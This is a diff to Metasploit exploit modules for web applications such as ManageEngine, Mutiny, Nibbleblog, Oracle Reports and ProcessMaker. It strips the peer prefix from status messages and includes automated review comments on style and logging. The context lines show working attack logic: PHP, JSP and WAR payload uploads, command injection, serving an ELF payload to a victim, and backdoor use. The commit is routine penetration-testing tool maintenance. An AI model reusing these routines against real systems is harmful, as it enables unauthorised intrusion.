target...") @my_target = pick_target - print_status("#{peer} - Selected target #{@my_target.name}") + print_status("Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 
@@ -402,7 +402,7 @@ class Metasploit3 < Msf::Exploit::Remote # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) - print_status("#{peer} - Uploading bogus file...") + print_status("Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Failure::Unknown, "#{peer} - Bogus file upload failed") @@ -410,10 +410,10 @@ class Metasploit3 < Msf::Exploit::Remote end # Now send the actual payload - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful") + print_status("Upload appears to have been successful") else fail_with(Failure::Unknown, "#{peer} - EAR upload failed") end @@ -422,7 +422,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index db8164c450..5b8c04f0ce 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - print_status("#{peer} - Uploading EAR file...") + print_status("Uploading EAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', 
@@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") register_files_for_cleanup(jboss_path.gsub('../../','../') + "/null/" + ear_file_name) register_files_for_cleanup("Attachments/null/" + rand_file) diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 75c7502c84..55a33c3fe7 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) payload_name = "#{rand_text_alpha(5)}.php" - print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor") + print_status("Trying to upload #{payload_name} to mma.php Backdoor") data = Rex::MIME::Message.new @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.body =~ /uplod d0n3 in SAME file/ - print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...") + print_good("Our payload #{payload_name} has been uploaded. Calling payload...") register_files_for_cleanup(payload_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 1882bd0b24..d58161de13 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb 
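Review bot: The status line in the `@@ -116,7 +116,7 @@` hunk is still assembled with `+` and `.to_s` across two physical lines, which is harder to read than the interpolation used by every other message this commit touches. It can be a single call: `print_status("Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")`. The opmanager_socialit_file_upload hunk at `@@ -117,14 +117,14 @@` carries the same construction. The enclosing method starts and ends outside this hunk.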
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Upload payload # - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'uri' => normalize_uri(base, "/includes/savepage.php"), 'vars_get' => { @@ -97,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from server, will not continue.") + print_error("No response from server, will not continue.") return end # # Run payload # - print_status("#{peer} - Requesting '#{php_fname}'") + print_status("Requesting '#{php_fname}'") send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 61272300d7..5053599cb9 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - vprint_status("#{peer} - Sending check...") + vprint_status("Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload...") + print_status("Sending payload...") http_send_cmd(payload.encoded) end diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 8b06d3c753..485fc65d39 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb 
@@ -98,20 +98,20 @@ class Metasploit3 < Msf::Exploit::Remote ] unless not @netmask_eth0 cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/ - print_status("#{peer} - Restoring Network Information and Cleanup...") + print_status("Restoring Network Information and Cleanup...") begin session.shell_command_token(cmds.join(" ; ")) rescue - print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:") + print_error("Automatic restore and cleanup didn't work, please use these commands:") cmds.each { |cmd| print_warning(cmd) } end - print_good("#{peer} - Restoring and Cleanup successful") + print_good("Restoring and Cleanup successful") end def start_web_service - print_status("#{peer} - Setting up the Web Service...") + print_status("Setting up the Web Service...") if datastore['SSL'] ssl_restore = true @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote resource_uri = '/' + @elfname + '.elf' service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}" - print_status("#{peer} - Starting up our web service on #{service_url} ...") + print_status("Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote # wait for the data to be sent def wait_linux_payload - print_status("#{peer} - Waiting for the victim to request the ELF payload...") + print_status("Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) 
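Review bot: In the `@@ -98,20 +98,20 @@` hunk `print_good("Restoring and Cleanup successful")` sits after the `begin`/`rescue`/`end`, so it is printed even when the rescue branch has just reported that automatic restore and cleanup did not work. The operator then sees a failure message followed by a success message and may leave the target's network settings unrestored. Moving the call inside the `begin` block, directly after `session.shell_command_token(cmds.join(" ; "))`, limits it to the success path. The bare `rescue` would also be clearer as `rescue ::StandardError => e` with `e.message` included in the error line. The enclosing method starts outside this hunk.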
@@ -146,23 +146,23 @@ class Metasploit3 < Msf::Exploit::Remote end end - #print_status("#{peer} - Giving time to the payload to execute...") + #print_status("Giving time to the payload to execute...") #select(nil, nil, nil, 20) unless session_created? - print_status("#{peer} - Shutting down the web service...") + print_status("Shutting down the web service...") stop_service end # Handle incoming requests from the target def on_request_uri(cli, request) - vprint_status("#{peer} - on_request_uri called, #{request} requested") + vprint_status("on_request_uri called, #{request} requested") if (not @elf_data) - print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!") + print_error("A request came in, but the ELF archive wasn't ready yet!") return end - print_good("#{peer} - Sending the ELF payload to the target...") + print_good("Sending the ELF payload to the target...") @elf_sent = true send_response(cli, @elf_data) end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Login with the provided credentials...") + print_status("Login with the provided credentials...") res = send_request_cgi({ 'method' => 'POST', @@ -194,13 +194,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ - print_good("#{peer} - Login successful") + print_good("Login successful") session = $1 else fail_with(Failure::NoAccess, "#{peer} - Unable to login in Mutiny") end - print_status("#{peer} - Leaking current Network Information...") + print_status("Leaking current Network Information...") res = send_request_cgi({ 'method' => 'GET', 
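Review bot: The `@@ -146,23 +146,23 @@` hunk edits a line that is commented out (`#print_status("Giving time to the payload to execute...")`, together with `#select(nil, nil, nil, 20) unless session_created?` below it), so the commit is maintaining dead code by hand. Either delete both lines or replace them with a one-line comment stating why the wait was disabled, so the next reader does not mistake it for live behaviour. The enclosing method starts outside this hunk.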
@@ -216,16 +216,16 @@ class Metasploit3 < Msf::Exploit::Remote static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "") static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "") static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "") - print_good("#{peer} - Information leaked successfully") + print_good("Information leaked successfully") else - print_error("#{peer} - Error leaking information, trying to exploit with random values") + print_error("Error leaking information, trying to exploit with random values") end if target.name =~ /CMD/ injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3)) injection << "; #{payload.encoded}" else - print_status("#{peer} - Generating the ELF Payload...") + print_status("Generating the ELF Payload...") @elf_data = generate_payload_exe @elfname = Rex::Text.rand_text_alpha(3+rand(3)) service_url = start_web_service @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote end - print_status("#{peer} - Exploiting Command Injection...") + print_status("Exploiting Command Injection...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index 290931c1c4..a0c53a5fe2 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.php'), 
@@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote return end - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = do_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Nibbleblog.") + vprint_good("Authenticated with Nibbleblog.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = Rex::MIME::Message.new @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('auto', nil, nil, 'form-data; name="image_option"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'admin.php'), @@ -144,14 +144,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Unable to upload payload.') end - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") php_fname = 'image.php' payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_fname) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index 16676fc6bd..d9017acff1 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb 
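Review bot: `vprint_status("Authenticating using #{username}:#{password}")` writes the cleartext password to the console, and from there into any spooled or shared session log. Logging only the account is enough to follow the flow: `vprint_status("Authenticating as #{username}")`. The same applies, without the verbose guard, to `print_status("Login successful with #{username}:#{password}")` and the matching `print_error` in the php_volunteer_upload_exec hunk, and to `print_status("Attempt to login with '#{user}:#{pass}'")` in the qdpm_upload_exec hunk. The enclosing method starts outside this hunk.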
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # does not allow us to deploy WARs. Fix that by uploading a new context.xml file. # The file we are uploading has the same content apart from privileged="false" and lots of XML comments. # After replacing the context.xml file let's upload the WAR again. - print_status("#{peer} - Replacing Tomcat context file") + print_status("Replacing Tomcat context file") send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote }) else # We need to create the upload directories before our first attempt to upload the WAR. - print_status("#{peer} - Creating upload directories") + print_status("Creating upload directories") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(servlet_path), @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s - print_status("#{peer} - Uploading WAR file...") + print_status("Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(servlet_path), 'method' => 'POST', @@ -117,14 +117,14 @@ class Metasploit3 < Msf::Exploit::Remote # The server either returns a 500 error or a 200 OK when the upload is successful. if res and (res.code == 500 or res.code == 200) - print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + + print_status("Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s + " seconds for deployment") sleep(datastore['SLEEP']) else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end - print_status("#{peer} - Executing payload, wait for session...") + print_status("Executing payload, wait for session...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' 
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep_counter = 0 while not session_created? if sleep_counter == datastore['SLEEP'] - print_error("#{peer} - Failed to get a shell, let's try one more time") + print_error("Failed to get a shell, let's try one more time") upload_war_and_exec(true, app_base) return end diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 8c3f73bd2c..aa96081ab7 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - vprint_good "#{peer} - Windows install detected " + vprint_good "Windows install detected " path = $1.gsub("\\", "/") - vprint_status "#{peer} - Path: #{path}" + vprint_status "Path: #{path}" elsif res.body =~ /\/(.*)\/showenv/ - vprint_good "#{peer} - Linux install detected" - vprint_status "#{peer} - Path: #{$1}" + vprint_good "Linux install detected" + vprint_status "Path: #{$1}" else return Exploit::CheckCode::Safe end @@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.downcase.exclude?("<html>") - vprint_good "#{peer} - URLPARAMETER is vulnerable" + vprint_good "URLPARAMETER is vulnerable" return Exploit::CheckCode::Vulnerable else - vprint_status "#{peer} - URLPARAMETER is not vulnerable" + vprint_status "URLPARAMETER is not vulnerable" return Exploit::CheckCode::Safe end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote @payload_dir = datastore['PAYDIR'] @local_path = "" - print_status "#{peer} - Querying showenv!" + print_status "Querying showenv!" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"), 'method' => 'GET', 
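Review bot: In the oracle_reports_rce `@@ -79,12 +79,12 @@` hunk the message `"Windows install detected "` keeps a trailing space inside the string, while the Linux counterpart two lines below has none. Since the line is being rewritten anyway, `vprint_good "Windows install detected"` would make the pair consistent. The `@@ -127,17 +127,17 @@` hunk has the same trailing space in its `print_status` call. This file also calls `print_*` without parentheses in most hunks and with them in `exec_payload`; one form throughout would be easier to scan.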
@@ -127,17 +127,17 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /\\(.*)\\showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Windows install detected " + print_good "Query succeeded!" + print_status "Windows install detected " @local_path = $1.gsub("\\", "/") - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" elsif res.body =~ /\/(.*)\/showenv/ - print_good "#{peer} - Query succeeded!" - print_status "#{peer} - Linux install detected" + print_good "Query succeeded!" + print_status "Linux install detected" @local_path = $1 - print_status "#{peer} - Path: #{@local_path }" + print_status "Path: #{@local_path }" else - print_status "#{peer} - Query failed" + print_status "Query failed" fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable") end else @@ -145,14 +145,14 @@ class Metasploit3 < Msf::Exploit::Remote end if datastore['EXTURL'].blank? - print_status "#{peer} - Hosting payload locally ..." + print_status "Hosting payload locally ..." begin Timeout.timeout(datastore['HTTPDELAY']) {super} rescue Timeout::Error end exec_payload else - print_status "#{peer} - Using external url for payload delivery ..." + print_status "Using external url for payload delivery ..." @payload_url = datastore['EXTURL'] upload_payload exec_payload @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote end def upload_payload - print_status "#{peer} - Uploading payload ..." + print_status "Uploading payload ..." path = "/#{@local_path}#{@payload_dir}#{@payload_name}" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"), @@ -191,9 +191,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good "#{peer} - Payload hopefully uploaded!" + print_good "Payload hopefully uploaded!" else - print_status "#{peer} - Payload upload failed" + print_status "Payload upload failed" end end 
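Review bot: Failure outcomes in this file are reported with `print_status`, as in `print_status "Query failed"` in the `@@ -127,17 +127,17 @@` hunk and `print_status "Payload upload failed"` in the `@@ -191,9 +191,9 @@` hunk. They therefore appear with the same marker as ordinary progress lines and are easy to miss in a long run. `print_error "Query failed"` and `print_error "Payload upload failed"` would match how the other modules in this commit report failures. `print_status("Payload execution failed")` in the later `@@ -261,9 +261,9 @@` hunk is the same case.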
@@ -202,11 +202,11 @@ class Metasploit3 < Msf::Exploit::Remote gen_payload_name = rand_text_alpha(8+rand(8)) encoded_pl = Rex::Text.encode_base64(generate_payload_exe) - print_status "#{peer} - Building JSP shell ..." + print_status "Building JSP shell ..." len = encoded_pl.length if len >= 60000 #java string size limit ~60k workaround - print_status "#{peer} - Adjusting shell due to payload size" + print_status "Adjusting shell due to payload size" pl_first = encoded_pl.slice(0, 60000) pl_second = encoded_pl.slice(60000, len) big_payload = true @@ -252,8 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end def exec_payload - print_status("#{peer} - Our payload is at: /reports#{@payload_dir}#{@payload_name}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}") + print_status("Executing payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name), @@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 - print_good("#{peer} - Payload executed!") + print_good("Payload executed!") else - print_status("#{peer} - Payload execution failed") + print_status("Payload execution failed") end end end diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index 3db627caf4..e260323353 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") end return Exploit::CheckCode::Unknown 
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote end # upload PHP payload to images/[fname] - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php, cookies) @@ -146,13 +146,13 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 - print_good("#{peer} - File uploaded successfully") + print_good("File uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed") end # retrieve and execute PHP payload - print_status("#{peer} - Executing payload (images/#{@fname})") + print_status("Executing payload (images/#{@fname})") begin res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 8f8a58f69d..56dcda56d7 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a cookie, bail! if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 - vprint_status("#{peer} - Found cookie: #{cookie}") + vprint_status("Found cookie: #{cookie}") else return nil end 
@@ -194,49 +194,49 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] cookie = login(base, username, password) if cookie.nil? - print_error("#{peer} - Login failed with \"#{username}:#{password}\"") + print_error("Login failed with \"#{username}:#{password}\"") return end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") # Take a snapshot of the uploads directory # Viewing this doesn't actually require the user to login first, # but we supply the cookie anyway to act more like a real user. - print_status("#{peer} - Enumerating all the uploads...") + print_status("Enumerating all the uploads...") before = peek_uploads(base, cookie) if before.nil? - print_error("#{peer} - Unable to enumerate original uploads") + print_error("Unable to enumerate original uploads") return end # Upload our PHP shell - print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") + print_status("Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alpha(rand(10)+6) + '.php' desc = rand_text_alpha(rand(10)+5) php = %Q|<?php #{payload.encoded} ?>| res = upload(base, cookie, fname, php, desc) if res.nil? or res.body !~ /The file was successfuly uploaded/ - print_error("#{peer} - Failed to upload our file") + print_error("Failed to upload our file") return end # Now that we've uploaded our shell, let's take another snapshot # of the uploads directory. - print_status("#{peer} - Enumerating new uploads...") + print_status("Enumerating new uploads...") after = peek_uploads(base, cookie) if after.nil? - print_error("#{peer} - Unable to enumerate latest uploads") + print_error("Unable to enumerate latest uploads") return end # Find the filename of our uploaded shell files = get_my_file(before.body, after.body) if files.empty? - print_error("#{peer} - No new file(s) found. 
The upload probably failed.") + print_error("No new file(s) found. The upload probably failed.") return else - vprint_status("#{peer} - Found these new files: #{files.inspect}") + vprint_status("Found these new files: #{files.inspect}") end # There might be more than 1 new file, at least execute the first 10 diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index 5223279b46..ee92c2d006 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 - print_good("#{peer} - Logged in to the file manager") + print_good("Logged in to the file manager") cookie = res.get_cookies cookie else diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index 6ce71ac09d..2eed181293 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = normalize_uri(uri + "/" + payload_name) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index 340e9c6f02..ee5adbdc09 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb 
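Review bot: In the php_volunteer_upload_exec `@@ -194,49 +194,49 @@` hunk the message `"Uploading PHP payload (#{payload.encoded.length.to_s} bytes)"` calls `.to_s` inside an interpolation, which already converts its value to a string. `print_status("Uploading PHP payload (#{payload.encoded.length} bytes)")` is equivalent and matches the pandora_upload_exec hunk, which prints the same message without the extra call. `#{p.length.to_s}` in the qdpm_upload_exec `@@ -251,7 +251,7 @@` hunk is the same case. The enclosing method starts outside this hunk and continues past it.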
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\"")) post_data = data.to_s - print_status("#{peer} - Uploading payload #{@payload_name}") + print_status("Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end upload_uri = "#{upload_dir}#{@payload_name}" - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index e00a483e23..9a7f37a6ca 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send payload - vprint_status("#{peer} - Attempting to execute: #{cmd}") + vprint_status("Attempting to execute: #{cmd}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, vuln_url), @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] # send login request - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', 
@@ -103,14 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => vars_post }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - print_error("#{peer} - Connection failed") + print_error("Connection failed") return false end if res and res.code == 200 and res.body =~ /Loading styles and images/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = execute_command("echo #{fingerprint}") if res and res.body =~ /#{fingerprint}/ @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe @@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote # upload payload code = "<?php #{payload.encoded} ?>" - print_status("#{peer} - Sending payload '#{@fname}' (#{code.length} bytes)") + print_status("Sending payload '#{@fname}' (#{code.length} bytes)") begin res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function } ) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(@fname) else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") 
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote upload # execute payload - print_status("#{peer} - Retrieving file '#{@fname}'") + print_status("Retrieving file '#{@fname}'") send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")}) end end diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 2b5fe040b1..ad3841acbc 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_warning("#{peer} - Removing: #{f}") + print_warning("Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.shell_command_token("rm #{f}") end rescue ::Exception => e - print_error("#{peer} - Unable to remove #{f}: #{e.message}") + print_error("Unable to remove #{f}: #{e.message}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] # Get user 